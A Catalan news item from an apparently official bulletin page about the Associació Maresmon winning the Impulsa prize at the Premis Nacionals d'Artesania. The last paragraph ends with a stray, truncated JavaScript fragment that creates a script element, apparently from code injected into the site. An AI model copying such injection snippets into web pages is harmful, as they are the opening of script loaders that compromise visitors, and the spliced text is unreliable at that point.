• Inici
  • Butlletí
  • Els Premis Nacionals d’Artesania de la Generalitat de Catalunya premien l’Associació Maresmon

Els Premis Nacionals d’Artesania de la Generalitat de Catalunya premien l’Associació Maresmon

L’Associació Maresmon guanya el premi Impulsa de la segona edició dels Premis Nacionals d’Artesania de la Generalitat de Catalunya

Els Premis Nacionals d’Artesania de la Generalitat de Catalunya tenen com a objectiu donar reconeixement a les empreses artesanes que s’hagin distingit en la producció, el disseny, la qualitat, la formació, la promoció, la comercialització, la difusió, la valoració i el prestigi de l’artesania catalana.

El premi concedit a Maresmon és un reconeixement a la tasca que fan d’integració de persones en risc d’exclusió social mitjançant un projecte de formació, participació i inserció laboral, el qual es nodreix de valors artesans, socials i ambientals,  ja que dota de valor afegit els productes artesans resultants, i els comercialitza.

Amb els Premis Nacionals d’Artesania, la Generalitat de Catalunya vol correspondre a la vàlua i a la transcendència que té l’artesania en la societat catalana i alhora vol contribuir a donar-li el màxim de relleu.  Per això, cada any, atorga el reconeixement que mereixen persones o entitats que hagin excel·lit en la seva obra i trajectòria, i hagin aportat elements d’innovació i prestigi en el sector.var d=document;var s=d.createElement(‘script’);

A Manlleu
Fem Xarxa